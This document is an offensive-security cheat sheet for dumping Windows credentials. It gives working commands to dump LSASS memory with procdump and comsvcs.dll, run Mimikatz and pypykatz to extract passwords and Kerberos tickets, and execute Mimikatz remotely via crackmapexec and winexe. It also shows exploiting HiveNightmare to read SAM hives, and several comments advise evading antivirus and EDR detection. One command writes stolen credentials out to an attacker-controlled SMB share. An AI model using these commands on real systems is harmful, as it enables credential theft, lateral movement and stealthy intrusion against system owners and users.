LSASS, Mimikatz, SAM

# Avoiding running Mimikatz on the target can be a nice solution for stealth
# You can just dump the LSASS process, get them and parse it locally
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Several dumping methods here
- https://kaluche.github.io/posts/2020/09/dumping-credentials-offline/
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md

# You can use the cmsvcs.dll DLL in order the dump LSASS (https://beta.hackndo.com/remote-lsass-dump-passwords/)
# C:\Windows\System32
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full

# Dumping LSASS using the Windows Error Reporting process
https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2

# Tool using SilentProcessExit
https://github.com/deepinstinct/LsassSilentProcessExit

# The idea is to use the legit WER functionnality to dump LSASS without crashing it
# And to evade AV/EDR detection

# If you have an LSASS dump, you can use the minidump module
mimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonPasswords /full

# You can upload mimikatz to a remote machine with smbclient

# Or you can use crackmapexec
# Executon may fail but the binary will be uploaded in C:\\Windows\\mimikatz.exe
crackmapexec IP -u user -p password -M mimikatz

# Then you can execute remotely through winexe
winexe -U admin%password //IP C:\\Windows\\mimikatz.exe

# Password dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords /full

# In case of Mimikatz is trigerred on the target machine, you can try bring it up using network share
sudo python smbserver.py SHARE /home/xxxxx/share_path/

sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords /full" exit > \\share_ip\SHARE\mimiout_$env:computername.txt'

# In order to be stealthier, you can even do the same for procdump
sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\procdump.exe "TODO"'

https://github.com/skelsec/pypykatz

# Mimikatz implementation in pure Python. At least a part of it :)
# In case of mimikatz is trigerred by the target AV
# Cross platform (only need python3.6)

# Live commands need to be ran on live systems
# Others commands can be used for other purposes

# Get LSASS credentials (+ Kerberos tickets)
pypykatz live lsa
pypykatz live lsa -o <output_dir> -k <kerberos_dir>

# List users prone to SPNRoast and ASRepRoast
pypykatz live ldap spn
pypykatz live ldap asrep

# Print all tokens
pypykatz live token list

# Spawn a SYSTEM shell
pypykatz live process create

# Print registry credentials
pypykatz live registry

# List all users ever logged on the target
pypykatz live users list

# Gives back the current user in domain:username:SID format
pypykatz live users whoami

# Parsr mimidump file
pypykatz lsa minidump <input_file>

# List domain users prone to SPNRoast or ASRepRoast
pypykatz ldap TEST/victim/pw:@10.10.10.2 spn
pypykatz ldap TEST/victim/pw:@10.10.10.2 asrep

# Decrypt gpp-pass
pypykatz gppass <base64_enc_password>

# Blogpost about the vuln
# Explanations, detection, mitigation included
https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5

# PoC
https://github.com/GossiTheDog/HiveNightmare

# Recap : Non-admin local users can read some hives (including SAM, SECURITY, SYSTEM) on hosts

# Impacted
# All Windows 10 released throught the last 3 years
# All versions since 1809

# Usage
.\HiveNightmare.exe [max shadow to look at]

# Then, get creds
python3 secretsdump.py -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL

https://twitter.com/mpgn_x64/status/1545506443696246785
# Tools like chntpw, bkhive, pwdump, samdump2 are not working on latest Windows 10

# cd Windows/System32/config
# pypykatz registry --sam SAM SYSTEM